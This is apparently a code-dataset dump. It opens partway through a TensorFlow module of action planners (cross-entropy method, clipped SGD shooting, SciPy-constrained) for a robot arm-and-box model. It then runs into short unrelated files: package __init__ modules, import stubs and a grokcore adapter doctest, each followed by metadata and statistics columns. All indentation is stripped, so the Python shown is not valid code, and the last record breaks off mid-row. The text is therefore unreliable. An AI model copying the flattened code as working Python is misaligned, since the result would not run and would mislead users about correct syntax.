batch_S_init = np.dot(np.ones([init_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([init_batch_size, 1]), S_goal.reshape(1,-1))
#CEM
actions = np.random.rand(self.max_length, init_batch_size, 4)*2 - 1
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
#debug
# action_pen, objective_debug = self.sess.run([tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.3, self.objective_list[14]], feed_dict = {self.action_ph:actions, \
# self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
# import pdb; pdb.set_trace()
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
batch_S_init = np.dot(np.ones([self.sample_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([self.sample_batch_size, 1]), S_goal.reshape(1,-1))
for i in range(stop_itr-1):
actions = np.random.multivariate_normal(mean_list, cov_matrix, self.sample_batch_size).reshape(self.sample_batch_size, self.max_length, 4)
actions = np.moveaxis(actions, 0,1)
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
# import pdb; pdb.set_trace()
#if debug, visualize all forward model's output
best_action = best_actions[:,0,:]
arm_loss, box_loss,forward_models_outputs, final_objective = self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], \
self.forward_model_output_list, self.objective_list[steps-1]], \
{self.action_ph: best_action.reshape(15,1,4), \
self.S_init_ph:[S_init], self.S_goal_ph:[S_goal]})
print("final objective")
print(final_objective)
arm_obj = np.sum(np.square(forward_models_outputs[steps-1][0][:4] - S_goal[:4]))
box_obj = np.sum(np.square(forward_models_outputs[steps-1][0][4:7] - S_goal[4:7]))
print('arm objective is {}, box objective is {}'.format(arm_obj, box_obj))
# import pdb; pdb.set_trace()
return best_actions[0,0], {'arm_loss':arm_loss, 'box_loss':box_loss, 'forward_models_outputs':forward_models_outputs[:steps]}
class FastClippedSgdShootingForwardModelPlanner_cumulated_obj(object):
def __init__(
self,
dynamic_model,
encoder,
env,
init_lr = 0.5,
sess = None,
pos_only = False,
max_length = 15,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
self.init_lr = init_lr
self.max_length = max_length
self.action_ph = tf.placeholder(tf.float32, [max_length, 1, 4])
self.forward_model_list = []
#build the recurrent model w.t. the max length
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
#only two feature encoders
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action_ph[0])
self.forward_model_list.append(forward_model)
for i in range(1,max_length):
forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,\
action_input = self.action_ph[i])
self.forward_model_list.append(forward_model)
## objective
self.objective_list = []
self.forward_model_loss_list = []
self.arm_loss_list = []
self.box_loss_list = []
objective = 0
factor = 1
if pos_only:
for forward_model in self.forward_model_list:
factor=factor*0.4
self.forward_model_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6])))
objective += factor*tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6]))
self.objective_list.append(objective)
self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
else:
for forward_model in self.forward_model_list:
objective += tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0]))
self.objective_list.append(objective)
self.action_grad_list = []
for obj in self.objective_list:
#those tail term in action_ph will receive 0 gradient
self.action_grad_list.append(tf.gradients(obj, self.action_ph))
self.vis_tool = MyAnimationMulti(None, numPlots=2, isIm=[0,0], axTitles=['(S1-S_goal)^2', 'sum(S_i-S_goal)^2'])
def get_action(self, S_init, S_goal, steps = None, plot_loss = False):
if steps == None:
steps = 1 #greedy planner
else:
assert(steps <= self.max_length)
action = np.zeros([self.max_length, 1, 4])
action_grad = self.action_grad_list[steps - 1]
# TODO: Find a good stop criteria
now = time.time()
S1_loss_list = []
Sn_loss_list = []
for i in range(0,101):
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal, self.action_ph : action}
S1_loss, Sn_loss = self.sess.run([self.objective_list[0], self.objective_list[steps-1]], feed_dict=feed_dict)
S1_loss_list.append(S1_loss)
Sn_loss_list.append(Sn_loss)
if plot_loss and i%20 ==0:
self.vis_tool._display([[range(i+1), S1_loss_list],[range(i+1), Sn_loss_list]])
gradient = np.array(self.sess.run(action_grad, feed_dict = feed_dict)[0])
if np.isnan(gradient).any():
action = np.random.rand(self.max_length, 1, 4)-0.5
print('nan gradient step{}'.format(i))
import pdb; pdb.set_trace()
else:
if np.linalg.norm(gradient) > steps*4:
gradient = gradient/np.linalg.norm(gradient)*4*steps
action -= gradient/1.0*self.init_lr
action = np.clip(action, -1, 1)
# if i %200 == 0:
# print("#########Optimizing action#########")
# action_loss, predicted_next_state = self.sess.run([self.objective_list[steps-1], self.forward_model_list[steps-1].output], feed_dict = feed_dict)
# box_loss = np.sum(np.square(predicted_next_state[0][4:6] - S_goal[4:6]))
# arm_loss = np.sum(np.square(predicted_next_state[0][0:4] - S_goal[0:4]))
# print("action_loss(sum_square_error(S_goal, S_next)) is {}, box_loss is {}, arm_loss is {}".format(action_loss, box_loss, arm_loss))
# print("current_action is {}".format(action[0][0]))
# # print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
# print("{} sec elapsed for 50 gradient steps".format(time.time() - now))
# now = time.time()
return action[0][0], self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], self.forward_model_list[0].output], feed_dict)
class FastClippedSgdShootingForwardModelPlanner(object):
def __init__(
self,
dynamic_model,
encoder,
env,
init_lr = 0.5,
sess = None,
pos_only = False,
max_length = 15,
):
self.env = env
if sess == None:
sess =tf.get_default_session()
self.sess = sess
self.init_lr = init_lr
self.max_length = max_length
self.action_ph = tf.placeholder(tf.float32, [max_length, 1, 4])
self.forward_model_list = []
#build the recurrent model w.t. the max length
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
#only two feature encoders
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action_ph[0])
self.forward_model_list.append(forward_model)
self.forward_model_output_list = [forward_model.output]
for i in range(1,max_length):
forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,\
action_input = self.action_ph[i])
self.forward_model_list.append(forward_model)
self.forward_model_output_list.append(forward_model.output)
## objective
self.objective_list = []
self.arm_loss_list = []
self.box_loss_list = []
if pos_only:
for forward_model in self.forward_model_list:
self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6])))
self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
else:
for forward_model in self.forward_model_list:
self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0])))
self.action_grad_list = []
for obj in self.objective_list:
#those tail term in action_ph will receive 0 gradient
self.action_grad_list.append(tf.gradients(obj, self.action_ph))
self.vis_tool = MyAnimationMulti(None, numPlots=2, isIm=[0,0], axTitles=['(S1-S_goal)^2', '(S_n-S_goal)^2'])
def get_action(self, S_init, S_goal, steps = None, plot_loss = False):
if steps == None:
steps = 1 #greedy planner
else:
assert(steps <= self.max_length)
action = np.zeros([self.max_length, 1, 4])
action_grad = self.action_grad_list[steps - 1]
# TODO: Find a good stop criteria
now = time.time()
S1_loss_list = []
Sn_loss_list = []
for i in range(0,51):
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal, self.action_ph : action}
S1_loss, Sn_loss = self.sess.run([self.box_loss_list[0], self.box_loss_list[steps-1]], feed_dict=feed_dict)
S1_loss_list.append(S1_loss)
Sn_loss_list.append(Sn_loss)
if plot_loss and i %1 == 0:
self.vis_tool._display([[range(i+1), S1_loss_list],[range(i+1), Sn_loss_list]])
gradient = np.array(self.sess.run(action_grad, feed_dict = feed_dict)[0])
if np.isnan(gradient).any():
action = np.random.rand(self.max_length, 1, 4)-0.5
print('nan gradient step{}'.format(i))
import pdb; pdb.set_trace()
else:
if np.linalg.norm(gradient) > steps*4:
gradient = gradient/np.linalg.norm(gradient)*4*steps
action -= gradient/(1.+i*0.05)*self.init_lr
action = np.clip(action, -1, 1)
arm_loss, box_loss, forward_models_outputs = \
self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], \
self.forward_model_output_list], feed_dict)
return action[0][0], planner_info(arm_loss, box_loss, forward_models_outputs[:steps])
class FastClippedSgdForwardModelPlanner(object):
def __init__(
self,
dynamic_model,
encoder,
env,
action_initializer = None,
init_lr = 1,
sess = None,
pos_only = False,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
# with tf.variable_scope('action_optimizer'):
# self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
self.action_ph = tf.placeholder(tf.float32, [None, 4])
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action_ph)
## objective
if pos_only:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
else:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
self.arm_loss = tf.reduce_sum(tf.square(self.forward_model.output[0][:4] - self.encoder2.output[0][:4]))
self.box_loss = tf.reduce_sum(tf.square(self.forward_model.output[0][4:6] - self.encoder2.output[0][4:6]))
#Adam optimizer has its own variables. Wrap it by a namescope
self.action_grad = tf.gradients(self.objective, self.action_ph)
# with tf.variable_scope('action_optimizer'):
# self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list = [self.clipped_action])
# self.action_gradient = tf.train.AdamOptimizer(init_lr).compute_gradients(self.objective, var_list = [self.action])
def get_action(self, S_init, S_goal):
#first re-initialize everyvariables in "action_optimizer"
# variables = tf.get_collection(tf.GraphKeys.VARIABLES, scope='action_optimizer')
# self.sess.run(tf.initialize_variables(variables))
action = np.random.rand(4)-0.5
# TODO: Find a good stop criteria
now = time.time()
for i in range(0,151):
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal, self.action_ph : [action]}
gradient = self.sess.run([self.action_grad], feed_dict = feed_dict)[0][0][0]
#raises NotImplementedError: ('Trying to optimize unsupported type ', <tf.Tensor 'clip_by_value:0' shape=(1, 4) dtype=float32>)
#this code does not work....
# import pdb; pdb.set_trace()
action -= gradient/(1.+i*0.2)*0.5
action = np.clip(action, -1, 1)
if i %50 == 0:
print("#########Optimizing action#########")
action_loss = self.sess.run(self.objective, feed_dict = feed_dict)
print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
print("current_action is {}".format(action))
# print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
print("{} sec elapsed for 50 gradient steps".format(time.time() - now))
now = time.time()
return action, self.sess.run([ self.arm_loss, self.box_loss], feed_dict = feed_dict)
class SgdForwardModelPlanner(object):
def __init__(
self,
dynamic_model,
encoder,
env,
action_initializer = None,
init_lr = 1e-1,
sess = None,
pos_only = False,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
##re-construct the model
if action_initializer is None:
action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope('action_optimizer'):
self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
self.clipped_action = tf.clip_by_value(self.action, -1, 1)
# import pdb; pdb.set_trace()
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action)
## objective
if pos_only:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
else:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
#Adam optimizer has its own variables. Wrap it by a namescope
with tf.variable_scope('action_optimizer'):
self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list = [self.clipped_action])
# self.action_gradient = tf.train.AdamOptimizer(init_lr).compute_gradients(self.objective, var_list = [self.action])
def get_action(self, S_init, S_goal):
#first re-initialize everyvariables in "action_optimizer"
variables = tf.get_collection(tf.GraphKeys.VARIABLES, scope='action_optimizer')
self.sess.run(tf.initialize_variables(variables))
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal}
# TODO: Find a good stop criteria
now = time.time()
for i in range(0,150):
gradient = self.sess.run([self.action_opt], feed_dict = feed_dict)
#raises NotImplementedError: ('Trying to optimize unsupported type ', <tf.Tensor 'clip_by_value:0' shape=(1, 4) dtype=float32>)
#this code does not work....
if i %50 == 0:
print("#########Optimizing action#########")
action_loss = self.sess.run(self.objective, feed_dict = feed_dict)
print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
print("current_action is {}".format(self.sess.run(self.action)))
# print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
print("{} sec elapsed for 50 gradient steps".format(time.time() - now))
now = time.time()
return self.sess.run([self.action, self.objective], feed_dict = feed_dict)
#debug API
def predict_next_state(self, current_state, action, goal_state):
feed_dict = {self.S_init_ph:current_state, self.S_goal_ph: goal_state}
old_action = self.sess.run(self.action)
#assign new action
self.sess.run(self.action.assign([action]))
next_state, S_init, S_goal, loss = self.sess.run([self.forward_model.output,\
self.encoder1.output,\
self.encoder2.output,\
self.objective], feed_dict = feed_dict)
#assign back the old action
self.sess.run(self.action.assign(old_action))
return next_state, S_init, S_goal, loss
class ClippedSgdForwardModelPlanner(object):
def __init__(
self,
dynamic_model,
encoder,
env,
action_initializer = None,
init_lr = 1e-1,
sess = None,
pos_only = False,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
##re-construct the model
if action_initializer is None:
action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope('action_optimizer'):
self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
self.clipped_action = tf.clip_by_value(self.action, -1, 1)
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action)
## objective
if pos_only:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
else:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
#Adam optimizer has its own variables. Wrap it by a namescope
with tf.variable_scope('action_optimizer'):
self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list = [self.action])
self.action_gradient = tf.train.AdamOptimizer(init_lr).compute_gradients(self.objective, var_list = [self.action])
def get_action(self, S_init, S_goal):
#first re-initialize everyvariables in "action_optimizer"
variables = tf.get_collection(tf.GraphKeys.VARIABLES, scope='action_optimizer')
self.sess.run(tf.initialize_variables(variables))
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal}
# TODO: Find a good stop criteria
now = time.time()
for i in range(0,150):
#normal speed
self.sess.run([self.action_opt], feed_dict = feed_dict)
#slow and will be slower and slower
# self.sess.run([self.clipped_action, self.action.assign(self.clipped_action), self.action_opt], \
# feed_dict = feed_dict)
if i %50 == 0:
print("#########Optimizing action#########")
action_loss = self.sess.run(self.objective, feed_dict = feed_dict)
print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
print("current_action is {}".format(self.sess.run(self.clipped_action)))
# print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
print("{} sec elapsed for 100 gradient steps".format(time.time() - now))
now = time.time()
return self.sess.run([self.action, self.objective], feed_dict = feed_dict)
#debug API
def predict_next_state(self, current_state, action, goal_state):
feed_dict = {self.S_init_ph:current_state, self.S_goal_ph: goal_state}
old_action = self.sess.run(self.action)
#assign new action
self.sess.run(self.action.assign([action]))
next_state, S_init, S_goal, loss = self.sess.run([self.forward_model.output,\
self.encoder1.output,\
self.encoder2.output,\
self.objective], feed_dict = feed_dict)
#assign back the old action
self.sess.run(self.action.assign(old_action))
return next_state, S_init, S_goal, loss
from sandbox.rocky.tf.core.parameterized import Parameterized
class ParameterizedAction(Parameterized):
def __init__(self, env, sess, action_initializer = None):
Parameterized.__init__(self)
if action_initializer is None:
action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope('action_optimizer'):
self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
self.sess = sess
self.env = env
def get_action(self):
return self.sess.run(self.action)
def initalize_action(self):
self.sess.run(tf.initialize_variables(self.action))
return
class ConstrainedForwardModelPlanner(object):
def __init__(
self,
dynamic_model,
encoder,
env,
sess = None,
pos_only = False,
action_initializer = None,
optimizer = tf.contrib.opt.ScipyOptimizerInterface,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
if action_initializer is None:
action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope('action_optimizer'):
self.action = tf.get_variable('planner_action', [1,4], initializer=action_initializer)
## rebuild the dynamic model
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action)
## objective
if pos_only:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
else:
self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
self.loss = self.objective
self.inequalities = []
for i in range(4):
self.inequalities.append(1-tf.square(self.action[0][i]))
# Our default SciPy optimization algorithm, L-BFGS-B, does not support
# general constraints. Thus we use SLSQP instead.
def get_action(self, S_init, S_goal):
#first re-initialize everyvariables in "action_optimizer"
self.sess.run(tf.initialize_variables([self.action]))
feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal}
# need to re-initialize optimizer every time want to use it or it will optimize action without enforcing constrains.
optimizer = tf.contrib.opt.ScipyOptimizerInterface(
self.loss, var_list = [self.action], inequalities=self.inequalities, method='SLSQP')
now = time.time()
optimizer.minimize(self.sess, feed_dict = feed_dict)
print("it takes {} to optimize the action".format(time.time() - now))
return self.sess.run([self.action, self.loss], feed_dict = feed_dict)
| 42.500586
| 172
| 0.715582
| 5,532
| 36,253
| 4.42462
| 0.065799
| 0.052457
| 0.040446
| 0.023287
| 0.88671
| 0.867917
| 0.856641
| 0.842505
| 0.833762
| 0.820117
| 0
| 0.020035
| 0.153284
| 36,253
| 853
| 173
| 42.500586
| 0.777365
| 0.135354
| 0
| 0.789303
| 0
| 0
| 0.031687
| 0.005632
| 0
| 0
| 0
| 0.001172
| 0.009724
| 1
| 0.045381
| false
| 0
| 0.016207
| 0.004862
| 0.106969
| 0.032415
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
391022300e688e6c5ab4b77b3a3105685361a314
| 732
|
py
|
Python
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 67
|
2015-02-15T03:02:00.000Z
|
2021-07-04T02:12:29.000Z
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 29
|
2015-02-16T02:04:50.000Z
|
2020-12-02T18:06:17.000Z
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 44
|
2015-02-26T05:43:10.000Z
|
2020-12-02T02:11:39.000Z
|
from .pycrunchbase import (
CrunchBase,
)
from .resource import (
Acquisition,
Address,
Category,
Degree,
FundingRound,
Fund,
Image,
Investment,
IPO,
Job,
Location,
News,
Organization,
Page,
PageItem,
Person,
Product,
Relationship,
StockExchange,
Video,
Website,
)
__version__ = "0.3.9"
__all__ = [
'Acquisition',
'Address',
'Category',
'Degree',
'FundingRound',
'Fund',
'Image',
'Investment',
'IPO',
'Job',
'Location',
'News',
'Organization',
'Page',
'PageItem',
'Person',
'Product',
'Relationship',
'StockExchange',
'Video',
'Website',
'CrunchBase'
]
| 13.309091
| 27
| 0.534153
| 55
| 732
| 6.963636
| 0.563636
| 0.093995
| 0.13577
| 0.167102
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0
| 0.006098
| 0.327869
| 732
| 54
| 28
| 13.555556
| 0.772358
| 0
| 0
| 0
| 0
| 0
| 0.23224
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39108aaa5f16646a3ed5c0e0afaec3e5dff388ad
| 107
|
py
|
Python
|
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | 2
|
2021-08-31T15:51:55.000Z
|
2021-10-18T07:19:19.000Z
|
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | null | null | null |
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | null | null | null |
from dropconnect_tensorflow.dropconnect_tensorflow import DropConnectDense, DropConnectConv2D, DropConnect
| 53.5
| 106
| 0.915888
| 9
| 107
| 10.666667
| 0.666667
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 0.056075
| 107
| 1
| 107
| 107
| 0.940594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
393790c6c74505311873a4d3f3d4433885613ee4
| 289
|
py
|
Python
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 6
|
2020-08-26T18:54:42.000Z
|
2020-11-22T02:45:37.000Z
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 3
|
2020-07-13T13:44:09.000Z
|
2022-02-10T02:12:46.000Z
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 1
|
2021-03-24T09:51:22.000Z
|
2021-03-24T09:51:22.000Z
|
from image_augmentation.preprocessing.preprocess import cifar_baseline_augmentation, cifar_standardization
from image_augmentation.preprocessing.preprocess import imagenet_baseline_augmentation, imagenet_standardization
from image_augmentation.preprocessing import efficientnet_preprocess
| 72.25
| 112
| 0.927336
| 29
| 289
| 8.896552
| 0.37931
| 0.104651
| 0.244186
| 0.395349
| 0.635659
| 0.387597
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048443
| 289
| 3
| 113
| 96.333333
| 0.938182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2030a605cd752d14f209c7587eb4ae5e80ff522c
| 551
|
py
|
Python
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 1
|
2018-03-19T01:53:45.000Z
|
2018-03-19T01:53:45.000Z
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 6
|
2015-04-21T13:26:52.000Z
|
2020-11-24T07:03:27.000Z
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 4
|
2015-04-03T04:48:13.000Z
|
2018-01-12T06:50:02.000Z
|
"""
Imported model and adapter won't be grokked:
>>> import grokcore.component as grok
>>> grok.testing.grok(__name__)
>>> from grokcore.component.tests.adapter.adapter import IHome
>>> cave = Cave()
>>> home = IHome(cave)
Traceback (most recent call last):
...
TypeError: ('Could not adapt', <grokcore.component.tests.adapter.adapter.Cave object at ...>, <InterfaceClass grokcore.component.tests.adapter.adapter.IHome>)
""" # noqa: E501 line too long
from grokcore.component.tests.adapter.adapter import Cave, Home # noqa: F401
| 36.733333
| 160
| 0.713249
| 70
| 551
| 5.557143
| 0.542857
| 0.218509
| 0.226221
| 0.298201
| 0.421594
| 0.236504
| 0.236504
| 0
| 0
| 0
| 0
| 0.012766
| 0.147005
| 551
| 14
| 161
| 39.357143
| 0.814894
| 0.856624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3b308144a89e4fa0b94da6be42bebb4778d0030
| 88
|
py
|
Python
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 15
|
2020-10-03T05:20:31.000Z
|
2022-03-20T06:19:29.000Z
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 8
|
2020-10-02T09:51:39.000Z
|
2021-04-24T03:14:18.000Z
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
5735073008f722fab00f3866ef4a05f04620593b
|
[
"MIT"
] | 2
|
2021-04-16T06:33:49.000Z
|
2021-09-03T09:21:10.000Z
|
from autorop.call.Custom import Custom
from autorop.call.SystemBinSh import SystemBinSh
| 29.333333
| 48
| 0.863636
| 12
| 88
| 6.333333
| 0.5
